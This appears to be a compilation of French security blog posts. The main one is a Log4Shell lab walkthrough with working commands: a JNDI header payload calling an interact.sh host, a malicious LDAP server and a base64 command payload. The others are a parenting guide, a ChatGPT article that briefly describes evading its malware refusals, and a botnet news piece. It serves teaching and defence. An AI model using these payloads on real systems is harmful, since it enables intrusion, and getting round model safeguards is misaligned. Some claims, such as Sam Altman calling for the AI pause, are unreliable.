NIST published a critical CVE in the National Vulnerability Database on December 10, 2021, under the name CVE-2021-44228.

Apache Software Foundation assigned the maximum CVSS severity rating of 10.

{% tabs %}
{% tab title="NIST" %}
The National Institute of Standards and Technology (NIST) is a non-regulatory government agency that develops technologies, metrics, and standards to drive innovation and economic competitiveness of U.S.-based science and technology organizations. technologies. As part of this effort, NIST produces standards and guidelines to help federal agencies meet the requirements of the Federal Information Security Management Act (FISMA). NIST also helps these agencies protect their information and information systems through cost-effective programs.

SOURCE: [**NIST.GOV**](https://www.nist.gov/)
{% endtab %}

{% tab title="CVE" %}
The acronym CVE, for Common Vulnerabilities and Exposures in English, designates a public list of computer security vulnerabilities. When we talk about a CVE, we generally refer to a security vulnerability that has been assigned a CVE identifier. Security advisories published by vendors and researchers almost always mention at least one CVE identifier. CVEs help professionals coordinate their efforts to prioritize and resolve vulnerabilities, and thus strengthen the security of computer systems.

\
SOURCE: [**REDHAT**](https://www.redhat.com/fr/topics/security/what-is-cve)
{% endtab %}

{% tab title="CVSS" %}
The Common Vulnerability Scoring System (CVSS) captures the main characteristics of a vulnerability and produces a numerical score reflecting its severity. This numerical score can then be translated into a qualitative representation (such as low, medium, high, and critical) to help organizations properly assess and prioritize their vulnerability management processes. CVSS is a published standard used by organizations around the world, and SIG's mission is to continue to improve it.

SOURCE: [**FIRST.ORG**](https://www.first.org/cvss/)
{% endtab %}
{% endtabs %}

## COME

## Origin

CVE-2021-44228 comes from an unlikely place: MINECRAFT. Minecraft is a very popular game developed by Mojang Studios where people can freely interact with a fully editable 3D environment.

![An interesting article from ezpublish-france.fr: Minecraft launches a patch for the critical Log4j vulnerability](/files/Bo56yRlNU2WexQR9iP1o)

The game's chat feature is the cause of the exploit. The communications app, running a java api with the specific version of log4j, allowed malicious actors to block machines, kick all players, and more.

Under the right circumstances, it is also possible to execute code remotely via this exploit, which is why it is so dangerous and has been marked "zero-day" or "0-day".

{% tabs %}
{% tab title="Zero-day/0-day" %}
“Zero-day” is an umbrella term that describes the latest detected security vulnerabilities that cybercriminals can use to attack systems. The term “zero-day” refers to the fact that the vendor or developer has just become aware of the flaw, which means that they have “zero days” to correct it. A zero-day attack occurs when cybercriminals exploit the flaw before developers have a chance to patch it.

Definition: [**KASPERSKY**](https://www.kaspersky.fr/resource-center/definitions/zero-day-exploit)
{% endtab %}
{% endtabs %}

### Cause

The reason for this problem is the misuse of variable interpolation and the good old JNDI api, which has been around in Java for ages. Typically, software developers use a logging mechanism to report different flows within the software. During this process, a log message is transmitted as a character string to be saved in a log file.

The Log4j library has an additional feature that allows log messages to contain variables that are translated on the fly before being written to a log file. In the case of CVE-2021-44228, log4j translates a specific argument received as a formatted string and forces it to load Java code from another Java class stored on the server or from a remote server.

Log4j2 supports by default a logging feature called "Message Lookup Substitution". This feature allows certain special strings to be replaced, at logging time, with other dynamically generated strings. For example, saving the string Running ${java:runtime} will produce a result similar to the following:

> Running Java version 1.7.0\_67

It was discovered that one of the search methods, specifically the JNDI search associated with the LDAP protocol, retrieves a specific Java class from a remote source and deserializes it, executing part of the class code during of the process.

### LDAP & JNDI

Before learning how to exploit the vulnerability, two key words must be explained and understood: LDAP and JNDI.

#### LDAP

Lightweight Directory Access Protocol (LDAP) is a protocol that allows applications to quickly query user information.

Businesses store usernames, passwords, email addresses, printer connections, and other static data in directories. LDAP is an open, vendor-neutral application protocol for accessing and retaining this data. LDAP can also support authentication, so users can log in once and access many different files on the server.

In an enterprise, the average employee logs in and queries the LDAP server hundreds of times per day. At first glance, this person may not even know they are contacting the LDAP server, but a series of complex steps are followed to complete a simple query.

![How LDAP works (SOURCE: OTKA)](/files/u6GnYMWc8d8ywxRRGQfZ)

For an LDAP to successfully complete a query, the following steps are typically followed:

1. Session Connection: The user connects to the LDAP server through an LDAP port (usually port TCP/389).
2. Query: The user sends the query to the LDAP server. This could be, for example, an email search.
3. Answer: LDAP searches the directory for relevant information and provides it to the user.
4. Completion: After receiving the response, the user logs out of the LDAP port.

The LDAP query steps may seem simple, but in fact a lot of work has gone into making this process transparent, and a fair amount of code has been done to make these functions possible.

#### JNDI

JNDI stands for Java Naming and Directory Interface and is a JAVA API.

This API allows:

* to access different naming or directory services in a uniform manner;
* organize and search for information or objects by naming (java naming and directory interface);
* to perform operations on directories (java naming and directory interface) such as:
  * LDAP: a lightweight directory
  * DNS: Domain Name System or DNS is a distributed computing service used that translates Internet domain names into IP addresses or other records

Some points regarding the JNDI architecture:

![](/files/AnuJdLIvWe3gWsOtbW4z)

In this table you can see the levels of the architecture.

* All levels of the architecture are connected to the java application.
* The API provides a mechanism for binding an object to a name and for accessing naming and directory services.
* SPI allows naming and directory services to be plugged in seamlessly.
* The last level shows the directories that are connected to the interface.

## VIDI

## Test environment

For the test environment, what I personally use:

* Virtualization software: VirtualBox or VMware
* Machine Virtual: Kali Linux

To set up a server running a vulnerable version of the Log4j library, we will build a Docker image for this Spring Boot application created by christophetd which is vulnerable to Log4Shell exploitation.

First of all you need to install Docker on the Kali Linux machine.

Now you need to build an image that will include all the dependencies and source code of the vulnerable Java application.

* Copy the christophetd GITHUB directory to the /tmp folder

{% hint style="success" %} <mark style="color:green;">**git**</mark> clone <https://github.com/christophetd/log4shell-vulnerable-app.git> /tmp/log4shell-vulnerable-app
{% endhint %}

![](/files/YsuG61UtzjmLBV7ZE6cP)

* Enter the file

{% hint style="success" %} <mark style="color:green;">**cd**</mark> /tmp/log4shell-vulnerable-app
{% endhint %}

![](/files/pdffmHdt4RuGaZYSrhnj)

* Build the image

{% hint style="success" %} <mark style="color:green;">**sudo docker**</mark> build <mark style="color:purple;">**-t**</mark> log4shell-app .
{% endhint %}

![](/files/61hfaxkrS9ZrFb4N5VrI)

{% hint style="success" %} <mark style="color:green;">**sudo docker**</mark> run <mark style="color:purple;">**-it --network=host --name**</mark> log4shell-app log4shell-app&#x20;
{% endhint %}

![](/files/VfngymxcKhZn64ezWkyb)

Now there is an instance of the vulnerable application available on localhost:8080. It is possible to check this with the following command:

{% hint style="success" %} <mark style="color:green;">**sudo lsof**</mark> <mark style="color:purple;">**-i -P -n**</mark> <mark style="color:blue;">|</mark> <mark style="color:green;">**grep**</mark> LISTEN
{% endhint %}

![](/files/M1VYXNwvfbXF1fjf8FHQ)

Now the vulnerable application is in place in the test environment, the next step is the detection of the RCE type vulnerability via a request to a domain controlled by the attacker.

{% tabs %}
{% tab title="RCE" %}
Remote Code Execution attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from the execution of malware to an attacker taking complete control of a compromised machine.

Definition: [**CHECKPOINT**](https://www.checkpoint.com/cyber-hub/cyber-security/what-is-remote-code-execution-rce/#:~:text=Remote%20code%20execution%20\(RCE\)%20attacks,control%20over%20a%20compromised%20machine.)
{% endtab %}
{% endtabs %}

### Reconnaissance

With the application running on localhost:8080, we can detect that the application is vulnerable to Log4Shell by submitting a Java Naming and Directory Interface (JNDI) as a value for the X-Api-Version header which triggers a request to the domain controlled by the attacker.

Visit interactsh and copy the generated hostname:

![](/files/4EcUP2DdbqgzL6AI5MZD)

To detect external interaction, you must perform the following cURL request without forgetting to replace the interactsh host name with the one generated for your instance:

{% hint style="success" %} <mark style="color:green;">**curl**</mark> 127.0.0.1:8080 <mark style="color:purple;">**-H**</mark> 'X-Api-Version: $<mark style="color:blue;">**{**</mark>jndi:ldap\://c8kz9wf2vtc0000g4ktggrj9w6ryyyyyb.interact.sh/a<mark style="color:blue;">**}**</mark>'
{% endhint %}

![](/files/v89K8M9ZGFXxtSoafMiR)

{% tabs %}
{% tab title="cURL" %}
**cURL** is used in command lines or scripts to transfer data. curl is also used in cars, televisions, routers, printers, audio equipment, mobile phones, tablets, set-top boxes, media players and is the Internet transfer engine for thousands of software applications in over ten billion installations.

Definition: [**cURL.se**](https://curl.se/)
{% endtab %}
{% endtabs %}

After sending the request, the domain search appears on interactsh:

![](/files/VPCmAMrhaWT96qmYGQcx)

In the application logs the API request attempt also appeared:

![](/files/uE7azpxAfqGRCq9iIFm2)

It's time to attack the application ! :smile:

![](/files/VWxWMGlmfWjrXORdDEzv)

### Exploitation

To execute the commands, you must run an LDAP server with the capabilities to exploit JNDI injection attacks. Follow the steps to download the malicious LDAP server:

* Tédownload the JNDIExploit zip via the christophetd github link

![](/files/w4OiPevnzX5Z2tJCStJx)

-> Or via the following black9 github via the following command:

{% hint style="success" %} <mark style="color:green;">**git**</mark> clone <https://github.com/black9/Log4shell_JNDIExploit>
{% endhint %}

* Unzip/Unzip the file:

{% hint style="success" %} <mark style="color:green;">**unzip**</mark> JNDIExploit.v1.2.zip
{% endhint %}

![](/files/FSFJiNhkyhasOFoTB5RJ)

Once the ZIP archive is unzipped, the program's help menu can be accessed via the following command:

{% hint style="success" %} <mark style="color:green;">**java**</mark>**&#x20;**<mark style="color:purple;">**-jar**</mark> JNDIExploit-1.2-SNAPSHOT.jar <mark style="color:purple;">**-h**</mark>
{% endhint %}

![](/files/R9Wxr4NsN4d0eGcjPTPg)

To start the malicious LDAP server on localhost:1389, run the command:

{% hint style="success" %} <mark style="color:green;">**java**</mark>**&#x20;**<mark style="color:purple;">**-jar**</mark> JNDIExploit-1.2-SNAPSHOT.jar <mark style="color:purple;">**-i**</mark> 127.0.0.1 <mark style="color:purple;">**-p**</mark> 9001
{% endhint %}

![](/files/rOnMaXPtgi960JAMmFHp)

To obtain the reverse shell, a base64 echo command will be coded to write data to a file in the /tmp folder:

{% hint style="success" %} <mark style="color:green;">**echo**</mark>**&#x20;**<mark style="color:purple;">**-n**</mark> 'echo "PWNED par BE HACKTIVE" > /tmp/log4shell.txt' <mark style="color:blue;">**|**</mark> base64 <mark style="color:purple;">**-w**</mark> 0
{% endhint %}

![](/files/EyfI913ehEIr2tfCSCkN)

Finally, execute the request via the cURL command to the vulnerable application:

{% hint style="success" %} <mark style="color:green;">**curl**</mark> 127.0.0.1:8080 <mark style="color:purple;">**-H**</mark> 'X-Api-Version: $<mark style="color:blue;">**{**</mark>jndi:ldap\://127.0.0.1:1389/Basic/Command/Base64/ZWNobyAiQkUgSEFDS1RJVkUiID4gL3RtcC9sb2c0c2hlbGwudHh0<mark style="color:blue;">**}**</mark>'
{% endhint %}

![](/files/1P1p4wkpR114MOvuBLEk)

To verify that the command was executed:

{% hint style="success" %} <mark style="color:green;">**sudo docker**</mark> exec <mark style="color:purple;">**-it**</mark> log4shell-app sh

ls -l /tmp
{% endhint %}

![](/files/3czPMnvdfiAuFwJzR41g)

We succeeded ! :tada:

![](/files/3Ft7zY5mMQRy7CD31TGA)

The last chapter will discuss some important points to follow to protect yourself as much as possible from vulnerabilities linked to Log4j.

## VICI

### Identification

The first two questions an organization should ask itself are:

* Does Log4j exist within my applications?
* Where is Log4j implemented?

Specifically, it should focus on external applications that might use Log4j. This is a non-trivial task given that it is a library, rather than an installed application, and can be integrated with third-party providers and tools. For organizations that have robust resource inventories, these should be used to identify where Java, JVM (Java Virtual Machine), and Log4j libraries exist in their inventory. There are currently several resources that document known vulnerable applications and vendors. This is a great place to start. Take the time to review these listings and determine if the software is present in the organization's domain. If so, make sure the latest patches are applied.

* Databases affected by Log4j
* Software associated with Log4j
* Log4shell security advisories

Another method of identification would be to perform internal/external vulnerability scans, many of which now provide signatures or plugins to identify vulnerable Log4j instances.

## Update

The most comprehensive protective measure is to update and patch discovered vulnerable Log4j libraries, but obviously this is not possible in all cases. As of this writing, version 2.16.0 is the most recent, and more information regarding fixes for the latest Log4j vulnerabilities is available at:

* Apache Log4j Security Vulnerabilities

On December 14, 2021, a second CVE (CVE-2021-45046) was discovered in the Log4j library, rendering version 2.15.0 ineffective in certain default configurations. To resolve both CVE-2021-44228 and CVE-2021-45046, it is recommended to update the Log4j version to at least 2.16.0.

* CVE-2021-44228 (CVSS score: 10.0): An RCE vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)
* CVE-2021-45046 (CVSS score: 9.0) - An information leak and RCE vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, except 2.12.2 (Fixed in version 2.16. 0)
* CVE-2021-45105 (CVSS score: 7.5) - A denial of service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)

{% hint style="danger" %}
It is suggested to follow Apache's advice and upgrade to log4j version 2.17.0.
{% endhint %}

However, it is not always possible to make updates, there are other possibilities to remedy flaws linked to Log4j.

## Removing JndiLookup class

This vulnerability is due to the way Log4j uses JNDI.

One way to fix this vulnerability is to disable the use of JNDI message lookups, which Log4j 2.16.0 does. However, this can also be achieved by removing the entire JndiLookup class, which implements this functionality, from an affected Log4j package. Because Java components are essentially ZIP archives, administrators can run the following command to modify and fix a vulnerable package instance:

{% hint style="success" %}
zip -q -d Log4j-core-\*.jar org/apache/logging/Log4j/core/lookup/JndiLookup.class
{% endhint %}

### Alternatives

* This attack requires the affected host to establish an initial outbound connection with the adversary's malicious LDAP server to load the vulnerable Java class. Blocking standard ports for LDAP, LDAPS and RMI (389, 636, 1099, 1389), although not exhaustive as the port can be random, can reduce the attack surface.
* IPS and WAF, although not exhaustive due to the different evasion techniques possible in this attack, should be implemented to assist in detection and response.


# Protecting Your Child Online: Tips for Safer Internet Day

<figure><img src="/files/mhjrhFHmy0d52s1aTZsq" alt=""><figcaption></figcaption></figure>

“Safer Internet Day” or “Safer Internet Day” is an annual “celebration” (in quotes, because it is more of a reminder than a celebration) which aims to create a safer online environment for children and young people. This is a crucial reminder for parents and caregivers to take an active role in keeping children safe online. With the increasing use of technology, it is more important than ever to protect our children from the potential dangers that come with it.

## Tips for protecting children/young people

The list below is of course not exhaustive and only gives tips to help you:

### 1. Education et Communication

Personally, I find this point to be the most important because it highlights the importance of educating children to use the Internet but also to have no problem communicating with you as soon as they find a problem. on the internet.

Teach your child about the dangers of the Internet, such as online harassment, phishing, and sharing personal information. Make sure they understand the importance of privacy and the consequences of (high) online exposure.

It's also important to maintain open communication with your children about what they are doing online. Ask them questions about their online activity and encourage them to tell you about anything they see or feel.

As soon as your child starts accessing the internet, talk to them about what they read, what they watch and who they communicate with online - and continue the conversation as they get older. Ask your child what sites they visit or apps they use, make a list, and look at them together. Discuss with your child what you think is appropriate, and remind them that this may be different for other parents and their children. Listen to your child and agree on what is right for your family.

{% hint style="danger" %}
Remember that the time will come when they will have access to the Internet outside of the safety of home and you want them to be prepared for that. It is essential to teach them to know their online reputation and to be careful about how they behave, interact with people and represent themselves in such a public forum. They must always remember that the Internet is not private and above all the Internet does not forget anything.
{% endhint %}

<figure><img src="/files/YrUkMslvGPqkUNOTYn6P" alt=""><figcaption></figcaption></figure>

#### Self-eduquer

Self-education is very important for a parent. You have to stay up to date with the latest technologies, the latest social networks and understand how to be safe online so that you can pass it on to your children/young people.&#x20;

Join the same networks and apps as your children and familiarize yourself with privacy settings and reporting/protection mechanisms. Then teach your children about reporting inappropriate messages, blocking someone, keeping information private, and the need to speak to someone they trust if they are being harassed online.

### 2. Lead by example

As a parent, you have an important role to play when it comes to your children's internet use. By showing responsible behavior online, you can demonstrate to your children the best practices to adopt. Limit your own screen time and always be vigilant and respectful when online.&#x20;

This shows your children how to use the internet responsibly. Keep in mind that the goal is not to scare your children, but to give them the skills to get the most out of the internet while avoiding its dangers.

<figure><img src="/files/ujVtryRhBK9c6IDShhtO" alt=""><figcaption></figcaption></figure>

### 3. Have an eye on screens and their social networks

By placing the computer/tablet/smartphone in a common area of ​​the house, such as the living room, it will be easier for you to monitor your younger children's online activity and make sure they are not doing anything dangerous .

For younger children, you can also check their browser history after they have been online to see the websites they have visited. As they grow older and learn to clear their history, communication about internet use becomes even more important.

When they are older, it might also be a good idea to put in place rules (a mutual agreement between the young person and the parents) on the use of devices in the bedroom.

Check your child's social media and make sure they are not being bullied, exposed to inappropriate content, or engaging in behavior that could damage their reputation.

Your child should be aware of the risk that their personal information or images may be made public once they post it online. Although he won't fully understand the consequences of disclosing personal information online, you need to teach him to be careful and thoughtful about what he posts and shares.

Encourage your children to ask themselves, before posting anything, whether they would give this information: name, phone number, home address, email, school name or this photo to a stranger. If the answer is no, don't post it. Every photo and personal detail posted and shared on social media and the internet contributes to a person's digital footprint.

{% hint style="info" %}
Digital fingerprint:

A digital footprint, also called a digital shadow or electronic footprint, refers to the data you leave behind when you use the Internet. This data includes the websites you visit, the emails you send, and the information you submit online. A digital footprint can be used to track a person's online activities and devices. Internet users can create their digital footprint actively or passively.

Source: [**KASPERSKY**](https://www.kaspersky.fr/resource-center/definitions/what-is-a-digital-footprint)
{% endhint %}

The big risk is that once information is shared publicly, it may be used in ways you don't expect and can't control.

You should also assume that anything posted online is permanent (it can sometimes be deleted, but not always before others have seen and saved it). This is why children and young people must protect their images and information intelligently.&#x20;

The same goes for parents who regularly post photos of themselves and/or their children online. Teach your child to stay in control of their digital footprint, only sharing their photos with people they know and trust. Rather than posting to all their friends on social media, encourage them to be selective and use the privacy settings of the social media platforms they use.

<figure><img src="/files/HQ0sPH0SJZyfgv7Y2Uw6" alt=""><figcaption></figcaption></figure>

### 4. Know friends and be their best friend

Adults know that some people online are not who they say they are, but children and young people can be terribly unaware and naive. Make sure you are part of your child's circle of friends on their social networks and monitor their posts.

{% hint style="info" %}
Once in your children's friends/followers list, don't become a burden. Don't post photos that might make them uncomfortable with their other classmates, don't comment on their posts if they ask you to.&#x20;

Respect their space and above all, as a parent, become your children's best friend. This is important to facilitate communication.
{% endhint %}

<figure><img src="/files/Qo212smRQc6h8iXLIHEA" alt=""><figcaption></figcaption></figure>

### 5. Parental Control

Parental controls are software or device-specific options that allow parents to monitor their children's internet usage. They prevent children from accessing inappropriate, unsuitable or illegal content online.

They can be implemented within your Internet Service Provider, search engines, video streaming sites, chat software and more.

Examples of parental control implementations:

1. Internet Filters: An Internet filter is software that restricts access to websites based on specified criteria, such as age-inappropriate content or specific keywords.
2. TV Content Filters: Some cable and satellite TV providers offer parental control features, such as content blocking, which allows parents to restrict access to channels or shows based on their content ratings.
3. Game console restrictions: Game consoles, such as Xbox and PlayStation, often have parental controls settings that allow parents to restrict access to games based on their age ratings and restrict online interactions with other players.
4. Mobile device control: Many smartphones and tablets have parental control features that allow parents to set restrictions on apps, downloads and internet access.

<figure><img src="/files/lHp51IIA7RDQrNoCGNuG" alt=""><figcaption></figcaption></figure>

## Conclusion

Safer Internet Day is a crucial annual event that highlights the importance of protecting children online. On the other hand, you don't have to wait for this date to realize it and make good resolutions. It’s a daily and lifelong job. It is essential to provide appropriate education and communication, set an example for online behavior, monitor children's online activities and help them develop safe online relationships.&#x20;

As parents, guardians or protectors of children, we have a responsibility to keep children safe online and prepare them to navigate this evolving digital world responsibly. “Protect children online, build a safer Internet for everyone with Safer Internet Day.”


# ChatGPT: Revolution or threat?

ChatGPT: between technological revolution and confidentiality dilemma. Discover the potential and the pitfalls.

<figure><img src="/files/Wz4XFLtCWDjdTLMNz23o" alt=""><figcaption></figcaption></figure>

Since OpenAI's global deployment of ChatGPT, opinions have diverged. Some believe it will revolutionize the way we live and work, while others express concern about its potential for disruption, particularly with regard to the privacy of individuals and organizations. Incidents have already occurred such as sensitive information being exposed, and employees having to face consequences following the entry of confidential company data into the chatbot. An example:

* Samsung has taken action following revelations that three of its employees leaked sensitive data using ChatGPT. Workers were allowed to use the chatbot to experiment with fixing problems in the company's source code. SOURCE: TECHMONITOR.AI

Some countries have even imposed a temporary ban on its use in an effort to protect data.

So let's ask ourselves the following questions:

* What exactly does ChatGPT do with our information and how can we use it securely?
* What are the benefits in terms of cybersecurity?
* What are the risks?

The following article will try to answer as many important questions around ChatGPT as possible.

<figure><img src="/files/LSY1Q7OTR84CmKUR8YJ0" alt=""><figcaption></figcaption></figure>

## ChatGPT ?&#x20;

Before we get into the risks, Q\&A, benefits and everything else, do you know what CHATGPT is?

* If so, read on anyway.
* If not, please read the rest carefully.

And what better way to define ChatGPT than ChatGPT itself!

<figure><img src="/files/b8BFMuMQUkXiIINSUa4t" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
**ChatGPT**:

ChatGPT is an artificial language model developed by OpenAI. Based on the GPT (Generative Pretrained Transformer) architecture, it is capable of autonomously generating text, answering questions, writing essays, creating and debugging code, solving complex mathematical equations and even translate between different languages.

It was "trained" on a large amount of data from the Internet, including books, Wikipedia, articles and other online content. This gives him the ability to understand and generate text conversationally, although he does not understand the meaning of the text in the same way a human would.

It's important to note, although ChatGPT is capable of producing impressive responses, that its responses are based on patterns in the data it was trained on, not an actual understanding of the world.

SOURCE: [**CHATGPT**](https://chat.openai.com/)
{% endhint %}

However, as a natural language processing tool, its operation is based on probability. It generates answers by predicting the next word in a sentence, based on the millions of examples it was trained on.

## ChatGPT and cybersecurity

### Is our data safe?

ChatGPT stores user requests/prompts and responses to continually refine its algorithms.

Even after your interactions are deleted, the bot retains the ability to use this data to improve its AI capabilities. This situation could potentially be risky if users enter sensitive personal or organizational data that could be attractive to malicious entities in the event of a data breach.

Additionally, it also archives other personal details while in operation, such as the user's approximate geographic location, IP address, payment information, and device specifications (although this type collection of data is common for most websites for analytical purposes, and therefore, not exclusive to ChatGPT). The data collection techniques deployed by OpenAI have raised concerns among some researchers, given that the data extracted could encompass copyrighted material.

## Malicious users

It appears that ChatGPT is increasingly being exploited for malicious purposes. His code writing skills can be used to create malware, develop dark websites, and execute cyber attacks.

Several cases of malicious code writing, phishing emails and other cyberattack techniques have been reported by users. Such as the orchestration of very sophisticated phishing attacks. By improving the language used, ChatGPT removes the telltale signs of poor spelling and grammar often associated with phishing attempts.&#x20;

Additionally, it has been used to better understand the psychology of targeted recipients, with the aim of inducing stress and thus increasing the effectiveness of phishing attacks. In March 2023, more than a thousand AI experts, including OpenAI co-founders Elon Musk and Sam Altman, advocated for an immediate halt to production of major generative AI tools for at least six months. This pause should allow researchers to understand the risks associated with these tools and develop mitigation strategies.

<figure><img src="/files/FW1X716c9HwfQ4ug50DV" alt=""><figcaption><p>SOURCE: <a href="https://twitter.com/elonmusk/status/1599128577068650498?s=20"><strong>TWITTER</strong> </a></p></figcaption></figure>

<figure><img src="/files/bJVA3IAGSeIn0g35hHRB" alt=""><figcaption><p>SOURCE: <a href="https://twitter.com/sama/status/1599134747761946624?s=20"><strong>TWITTER</strong></a></p></figcaption></figure>

## Already known flaws?

What data breaches have occurred so far? OpenAI confirmed that a bug in the chatbot's source code may have caused a data leak in March 2023, allowing some users to see parts of another active user's chat history. It is also possible that payment information for 1.2% of ChatGPT Plus subscribers who were active during a given period was made available.&#x20;

OpenAI released a statement saying that the number of users whose data was exposed is "extremely small" because they would have had to open a subscription email or click on certain functions in a specific sequence during a given period to be assigned. However, ChatGPT was taken offline for several hours while the bug was fixed.

Prior to this, Samsung experienced three separate incidents in which confidential company information was fed into the chatbot (Samsung source code, the transcript of a company meeting, and a test sequence to identify defective chips), which gave rise to disciplinary investigations.&#x20;

The data has not been leaked as far as we know, but as mentioned above, everything entered into ChatGPT is stored to train its algorithm, so confidential information entered by Samsung staff members are, in theory, now available to anyone using the platform.

#### What if we asked CHATGPT directly

<figure><img src="/files/7VSEodUDa68CbSQap2b2" alt=""><figcaption></figcaption></figure>

OpenAI says it conducts annual testing to identify security weaknesses and prevent them from being exploited by malicious actors. It also runs a "bug reward program", inviting researchers and ethical hackers to test system security for vulnerabilities in exchange for a cash reward.

## Protection

As with all digital applications, ChatGPT states:

"If you have any concerns about the privacy or security of your interactions with ChatGPT, you are advised to avoid sharing any personally identifiable or sensitive information. Although OpenAI aims to provide a secure environment, it is essential to do exercise caution when interacting with AI systems or any online platforms.”&#x20;

Another general tip is to create a strong, unique password and close the app after using it, especially on shared devices. It is also possible to refuse that ChatGPT stores data by filling out an online form:

* Formulaire: User Content Opt Out Request

In April 2023, OpenAI introduced a new feature allowing users to turn off chat history. Conversations started after enabling this feature are not stored to train the algorithm and do not appear in the history sidebar, but are retained for 30 days before being permanently deleted.

## Benefits

**SOURCE**: [**TECHTARGET**](https://www.techtarget.com/)

-> The images below are generated by MidJourney:

* Midjourney is an independent research laboratory which produces an artificial intelligence program under the same name and which allows the creation of images from textual descriptions, following an operation similar to that of OpenAI's DALL-E.

## Cyber ​​Defense Automation

<figure><img src="/files/IGgK0v39byXCFCSCXTBj" alt=""><figcaption></figcaption></figure>

ChatGPT could help analysts in overworked security operations centers (SOCs) by automatically analyzing cybersecurity incidents and making strategic recommendations to help inform immediate and long-term defense measures.&#x20;

For example, rather than analyzing the risk of a given PowerShell script from scratch, a SOC analyst could rely on ChatGPT's assessment and recommendations. SecOps teams can also ask OpenAI more general questions, such as how to prevent dangerous PowerShell scripts from running or loading files from untrusted sources, to improve their overall security measures. organization.

## Opponent simulation

<figure><img src="/files/cfeSfR4wKXSgN3fPDmfR" alt=""><figcaption></figcaption></figure>

ChatGPT's settings mean it won't respond to requests it considers suspicious, but users continue to discover vulnerabilities. For example, if ChatGPT is asked to write ransomware code, it will refuse to do so. But many cybersecurity researchers have indicated that by describing relevant tactics, techniques and procedures - without using signal words such as malware or ransomware - they can trick the chatbot into producing malicious code.&#x20;

ChatGPT's creators will likely attempt to close these loopholes as they appear, but it seems plausible that attackers will continue to find workarounds. The good news is that penetration testers can also use these flaws to simulate realistic adversary behavior across various attack vectors in an effort to improve defensive controls.

## Cybersecurity Reports

<figure><img src="/files/v0AFWLmUzSzaOCCdKRzQ" alt=""><figcaption></figcaption></figure>

Detailed cybersecurity incident reporting plays a vital role in helping key stakeholders – i.e. SecOps teams, security managers, business executives, auditors, board members administration and business sectors - to understand and improve the security posture of an organization.&#x20;

However, producing incident reports is a long and tedious job. Cybersecurity practitioners could use ChatGPT to write reports by providing the application with details such as the following:

* The target of the compromise or attack.
* Scripts or shells used by attackers.
* Relevant data from the IT environment.
* By offloading some cybersecurity reporting tasks to ChatGPT, incident responders could spend more time on other critical activities.

In this way, generative AI could help alleviate issues of burnout and understaffing in the cybersecurity field.

## Threat Intelligence

<figure><img src="/files/tctfGnhEGtj9W83FATtu" alt=""><figcaption></figcaption></figure>

Threat researchers today have access to an unprecedented amount of cybersecurity intelligence from sources such as their enterprise infrastructure, external threat intelligence feeds, breach reports, publicly available data, the dark web and social media. Although knowledge is a power, humans cannot coherently analyze and synthesize such an amount of information in a meaningful way.

Generative AI, on the other hand, could soon do the following almost instantly:

* Consume vast volumes of threat intelligence data from various sources.
* Identify patterns in data.
* Create a list of new adversary tactics, techniques and procedures.&#x20;
* Recommend relevant cyber defense strategies.

With ChatGPT, cybersecurity teams could potentially be able to gain a complete, accurate and up-to-date understanding of the threat landscape in an instant, in order to adjust their security controls accordingly.

## Your opinion?

<figure><img src="/files/PKDVpR9UcLJS2BpjkMnA" alt=""><figcaption><p>This image is not generated by AI but belongs to NINTENDO</p></figcaption></figure>

I am interested in your opinion:

* What do you think of CHATGPT or any other AI?
* Do you have any fears or on the contrary are you very enthusiastic?
* Do you see limits, potential or just a trend?

React or leave me your question via the form ulaire :smile:


# The FBI dismantles Raptor Train: A Chinese Botnet that Infected 260,000 IoT Devices Worldwide!

<figure><img src="/files/c492HIctjOJDNfK5H2x0" alt=""><figcaption></figcaption></figure>

Raptor Train is a sophisticated and large-scale botnet active since May 2020. It has compromised more than 260,000 IoT devices and small business networks, including routers and IP cameras. This botnet is attributed to the Chinese state hacker group Flax Typhoon, known for its cyberespionage campaigns targeting critical infrastructure in the United States, Taiwan and other countries. This group uses a complex, multi-layered botnet architecture, making it a persistent threat that is difficult to eradicate.

⏩ For those who are not familiar with the technical terms, do not hesitate to consult the “Definition” chapter otherwise continue the article directly with the “Raptor Train Operation and Infrastructure” chapter.

## Raptor Train Operation and Infrastructure

The Raptor Train uses a three-tier network to maximize its efficiency and command and control capability:

* **Tier 1 (TIER 1):** Includes infected devices, such as routers, IP cameras and NAS servers. Infected devices in this tier typically remain active for approximately 17 days before being replaced with new compromised devices.

  * The majority of TIER 1 (Level 1) nodes are geolocated in the United States, Taiwan, Vietnam, Brazil, Hong Kong and Türkiye.

* **Tier 2 (TIER 2):** Consisting of dedicated virtual servers that act as C2 (Command and Control) servers, operating and delivering payloads to Tier 1 devices. These servers are strategically organized to make operations more difficult to detect and disturb.

  * Tier 2 nodes, on the other hand, rotate around every 75 days and are primarily based in the United States, Singapore, United Kingdom, Japan, and South Korea. The number of C2 nodes increased from approximately 1 to 5 between 2020 and 2022 to as many as 60 between June 2024 and August 2024.

* **Tier 3 (TIER 3):** This tier is responsible for manually managing Tier 2 nodes and oversees botnet operations, including sending commands, collecting data, and managing exploits through a centralized interface called Sparrow . Control is exercised via SSH connections during working hours in China, suggesting that the botnet operators work regular schedules.
  * In total, more than 1.2 million compromised device records were identified in a MySQL database hosted on a Tier 3 management server used to administer and control the botnet and C2 servers using the application Sparrow. Sparrow also contains a module for exploiting computer networks using an arsenal of known and zero-day vulnerabilities.

<figure><img src="/files/8YhOvIQ2tVkkwf9OIBJa" alt=""><figcaption><p><strong>Raptor Train botnet architecture</strong><br><em>source: Black Lotus Labs</em></p></figcaption></figure>

## Raptor Train Infection Campaigns

The Raptor Train botnet has conducted several separate campaigns since its emergence in 2020, exploiting various vulnerabilities in IoT devices and networks. These campaigns are differentiated by the C2 (Command and Control) domains and the types of devices targeted:

* Crossbill (from May 2020 to April 2022): Use of the C2 domain k3121.com and its associated subdomains.
* Finch (from July 2022 to June 2023): Use of the C2 domain b2047.com and its associated subdomains.
* Canary (May 2023 to August 2023): Use of the C2 domain b2047.com, with a multi-stage infection.
* Oriole (from June 2023 to September 2024): Use of the C2 domain w8510.com and its associated subdomains.

